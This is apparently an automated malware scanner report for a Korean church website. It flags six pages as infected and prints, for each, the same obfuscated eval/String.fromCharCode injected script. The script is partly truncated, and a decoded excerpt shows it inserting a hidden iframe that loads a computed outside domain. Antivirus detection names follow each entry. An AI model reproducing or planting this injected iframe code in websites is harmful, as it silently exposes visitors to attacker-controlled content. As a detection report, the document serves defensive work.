Malware Scanner report for afbckorea.org

Malicious/Suspicious/Total urls checked: 6/0/9

6 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/2

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://www.afbckorea.org/	200 OK Content-Length: 13293 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,77,111,110,116,104,78,117,109,40,97,98,98,77,111,110,116,104,41,32,123,32,32,32,32,118,97,114,32,97,114,114,77,111,110,32,61,32,110,101,119,32,65,114,114,97,121,40,32,34,74,97,110,34,44,32,34,70,101,98,34,44,32,34,77,97,114,34,44,32,34,65,112,114,34,44,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,34,77,97,121,34,44,32,34,74,117,110,34,44,32,34,74,117,108,34,44,32,34,65,32,117,103,34,44,3 ... 4917 bytes are skipped ...4,41,59,115,46,115,116,121,108,101,46,118,105,115,105,98,105,108,105,116,121,61,34,104,105,100,100,101,110,34,59,115,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,34,110,111,110,101,34,59,115,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,115,114,99,34,44,99,117,114,114,101,110,116,95,100,111,109,97,105,110,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,125,99,97,116,99,104,40,101,41,123,125,125,44,53,48,48,41,59)); Decoded script: function getMonthNum(abbMonth) { var arrMon = new Array( "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec" ); var i; for (i = 0; i < arrMon.length; i++) { if (abbMonth == arrMon[i]) { return i; } } return -1;}function dateUTCdateToDate(dateString) { var arrDateStr = dateString.split(" "); var month = getMonthNum(arrDateStr[2]); var day = arrDateStr[1 ... 3067 bytes are skipped ... s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } } /*** called setTimeout with function () { try { var s = document.createElement("iframe"); s.style.visibility = "hidden"; s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } }, 500 */ Antivirus reports: K7AntiVirus Trojan DrWeb JS.IFrame.140 Microsoft Exploit:HTML/IframeRef.AG NANO-Antivirus Trojan.Script.Agent.ufray F-Prot JS/IFrame.SG AVG HTML/Framer Commtouch JS/IFrame.SG
http://www.afbckorea.org/index.html	200 OK Content-Length: 13293 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,77,111,110,116,104,78,117,109,40,97,98,98,77,111,110,116,104,41,32,123,32,32,32,32,118,97,114,32,97,114,114,77,111,110,32,61,32,110,101,119,32,65,114,114,97,121,40,32,34,74,97,110,34,44,32,34,70,101,98,34,44,32,34,77,97,114,34,44,32,34,65,112,114,34,44,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,34,77,97,121,34,44,32,34,74,117,110,34,44,32,34,74,117,108,34,44,32,34,65,32,117,103,34,44,3 ... 4917 bytes are skipped ...4,41,59,115,46,115,116,121,108,101,46,118,105,115,105,98,105,108,105,116,121,61,34,104,105,100,100,101,110,34,59,115,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,34,110,111,110,101,34,59,115,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,115,114,99,34,44,99,117,114,114,101,110,116,95,100,111,109,97,105,110,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,125,99,97,116,99,104,40,101,41,123,125,125,44,53,48,48,41,59)); Decoded script: function getMonthNum(abbMonth) { var arrMon = new Array( "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec" ); var i; for (i = 0; i < arrMon.length; i++) { if (abbMonth == arrMon[i]) { return i; } } return -1;}function dateUTCdateToDate(dateString) { var arrDateStr = dateString.split(" "); var month = getMonthNum(arrDateStr[2]); var day = arrDateStr[1 ... 3067 bytes are skipped ... s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } } /*** called setTimeout with function () { try { var s = document.createElement("iframe"); s.style.visibility = "hidden"; s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } }, 500 */ Antivirus reports: K7AntiVirus Trojan DrWeb JS.IFrame.140 Microsoft Exploit:HTML/IframeRef.AG NANO-Antivirus Trojan.Script.Agent.ufray F-Prot JS/IFrame.SG AVG HTML/Framer Commtouch JS/IFrame.SG
http://www.afbckorea.org/servicetimes.htm	200 OK Content-Length: 9508 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,77,111,110,116,104,78,117,109,40,97,98,98,77,111,110,116,104,41,32,123,32,32,32,32,118,97,114,32,97,114,114,77,111,110,32,61,32,110,101,119,32,65,114,114,97,121,40,32,34,74,97,110,34,44,32,34,70,101,98,34,44,32,34,77,97,114,34,44,32,34,65,112,114,34,44,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,34,77,97,121,34,44,32,34,74,117,110,34,44,32,34,74,117,108,34,44,32,34,65,32,117,103,34,44,3 ... 4917 bytes are skipped ...4,41,59,115,46,115,116,121,108,101,46,118,105,115,105,98,105,108,105,116,121,61,34,104,105,100,100,101,110,34,59,115,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,34,110,111,110,101,34,59,115,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,115,114,99,34,44,99,117,114,114,101,110,116,95,100,111,109,97,105,110,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,125,99,97,116,99,104,40,101,41,123,125,125,44,53,48,48,41,59)); Decoded script: function getMonthNum(abbMonth) { var arrMon = new Array( "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec" ); var i; for (i = 0; i < arrMon.length; i++) { if (abbMonth == arrMon[i]) { return i; } } return -1;}function dateUTCdateToDate(dateString) { var arrDateStr = dateString.split(" "); var month = getMonthNum(arrDateStr[2]); var day = arrDateStr[1 ... 3067 bytes are skipped ... s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } } /*** called setTimeout with function () { try { var s = document.createElement("iframe"); s.style.visibility = "hidden"; s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } }, 500 */ Antivirus reports: K7AntiVirus Trojan DrWeb JS.IFrame.140 Microsoft Exploit:HTML/IframeRef.AG NANO-Antivirus Trojan.Script.Agent.ufray F-Prot JS/IFrame.SG AVG HTML/Framer Commtouch JS/IFrame.SG
http://www.afbckorea.org/directions.htm	200 OK Content-Length: 8258 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,77,111,110,116,104,78,117,109,40,97,98,98,77,111,110,116,104,41,32,123,32,32,32,32,118,97,114,32,97,114,114,77,111,110,32,61,32,110,101,119,32,65,114,114,97,121,40,32,34,74,97,110,34,44,32,34,70,101,98,34,44,32,34,77,97,114,34,44,32,34,65,112,114,34,44,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,34,77,97,121,34,44,32,34,74,117,110,34,44,32,34,74,117,108,34,44,32,34,65,32,117,103,34,44,3 ... 4917 bytes are skipped ...4,41,59,115,46,115,116,121,108,101,46,118,105,115,105,98,105,108,105,116,121,61,34,104,105,100,100,101,110,34,59,115,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,34,110,111,110,101,34,59,115,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,115,114,99,34,44,99,117,114,114,101,110,116,95,100,111,109,97,105,110,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,125,99,97,116,99,104,40,101,41,123,125,125,44,53,48,48,41,59)); Decoded script: function getMonthNum(abbMonth) { var arrMon = new Array( "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec" ); var i; for (i = 0; i < arrMon.length; i++) { if (abbMonth == arrMon[i]) { return i; } } return -1;}function dateUTCdateToDate(dateString) { var arrDateStr = dateString.split(" "); var month = getMonthNum(arrDateStr[2]); var day = arrDateStr[1 ... 3067 bytes are skipped ... s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } } /*** called setTimeout with function () { try { var s = document.createElement("iframe"); s.style.visibility = "hidden"; s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } }, 500 */ Antivirus reports: K7AntiVirus Trojan DrWeb JS.IFrame.140 Microsoft Exploit:HTML/IframeRef.AG NANO-Antivirus Trojan.Script.Agent.ufray F-Prot JS/IFrame.SG AVG HTML/Framer Commtouch JS/IFrame.SG
http://www.afbckorea.org/ourpastor.htm	200 OK Content-Length: 0 Content-Type: text/html	clean
http://www.afbckorea.org/test404page.js	404 Not Found Content-Length: 767 Content-Type: text/html	clean
http://www.afbckorea.org//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/	404 Not Found Content-Length: 767 Content-Type: text/html	clean
http://www.afbckorea.org/statementoffaith.htm	200 OK Content-Length: 24558 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,77,111,110,116,104,78,117,109,40,97,98,98,77,111,110,116,104,41,32,123,32,32,32,32,118,97,114,32,97,114,114,77,111,110,32,61,32,110,101,119,32,65,114,114,97,121,40,32,34,74,97,110,34,44,32,34,70,101,98,34,44,32,34,77,97,114,34,44,32,34,65,112,114,34,44,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,34,77,97,121,34,44,32,34,74,117,110,34,44,32,34,74,117,108,34,44,32,34,65,32,117,103,34,44,3 ... 4917 bytes are skipped ...4,41,59,115,46,115,116,121,108,101,46,118,105,115,105,98,105,108,105,116,121,61,34,104,105,100,100,101,110,34,59,115,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,34,110,111,110,101,34,59,115,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,115,114,99,34,44,99,117,114,114,101,110,116,95,100,111,109,97,105,110,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,125,99,97,116,99,104,40,101,41,123,125,125,44,53,48,48,41,59)); Decoded script: function getMonthNum(abbMonth) { var arrMon = new Array( "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec" ); var i; for (i = 0; i < arrMon.length; i++) { if (abbMonth == arrMon[i]) { return i; } } return -1;}function dateUTCdateToDate(dateString) { var arrDateStr = dateString.split(" "); var month = getMonthNum(arrDateStr[2]); var day = arrDateStr[1 ... 3067 bytes are skipped ... s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } } /*** called setTimeout with function () { try { var s = document.createElement("iframe"); s.style.visibility = "hidden"; s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } }, 500 */ Antivirus reports: K7AntiVirus Trojan DrWeb JS.IFrame.140 Microsoft Exploit:HTML/IframeRef.AG NANO-Antivirus Trojan.Script.Agent.ufray F-Prot JS/IFrame.SG AVG HTML/Framer Commtouch JS/IFrame.SG
http://www.afbckorea.org/ourmissionaries.htm	200 OK Content-Length: 42015 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,77,111,110,116,104,78,117,109,40,97,98,98,77,111,110,116,104,41,32,123,32,32,32,32,118,97,114,32,97,114,114,77,111,110,32,61,32,110,101,119,32,65,114,114,97,121,40,32,34,74,97,110,34,44,32,34,70,101,98,34,44,32,34,77,97,114,34,44,32,34,65,112,114,34,44,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,34,77,97,121,34,44,32,34,74,117,110,34,44,32,34,74,117,108,34,44,32,34,65,32,117,103,34,44,3 ... 4917 bytes are skipped ...4,41,59,115,46,115,116,121,108,101,46,118,105,115,105,98,105,108,105,116,121,61,34,104,105,100,100,101,110,34,59,115,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,34,110,111,110,101,34,59,115,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,115,114,99,34,44,99,117,114,114,101,110,116,95,100,111,109,97,105,110,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,125,99,97,116,99,104,40,101,41,123,125,125,44,53,48,48,41,59)); Decoded script: function getMonthNum(abbMonth) { var arrMon = new Array( "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec" ); var i; for (i = 0; i < arrMon.length; i++) { if (abbMonth == arrMon[i]) { return i; } } return -1;}function dateUTCdateToDate(dateString) { var arrDateStr = dateString.split(" "); var month = getMonthNum(arrDateStr[2]); var day = arrDateStr[1 ... 3067 bytes are skipped ... s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } } /*** called setTimeout with function () { try { var s = document.createElement("iframe"); s.style.visibility = "hidden"; s.style.display = "none"; s.setAttribute("src", current_domain); document.body.appendChild(s); } catch (e) { } }, 500 */ Antivirus reports: K7AntiVirus Trojan DrWeb JS.IFrame.140 Microsoft Exploit:HTML/IframeRef.AG NANO-Antivirus Trojan.Script.Agent.ufray F-Prot JS/IFrame.SG AVG HTML/Framer Commtouch JS/IFrame.SG

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: afbckorea.org

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: afbckorea.org
Referer: http://www.google.com/search?q=afbckorea.org

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=afbckorea.org

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://afbckorea.org/

Result: afbckorea.org is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for afbckorea.org

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools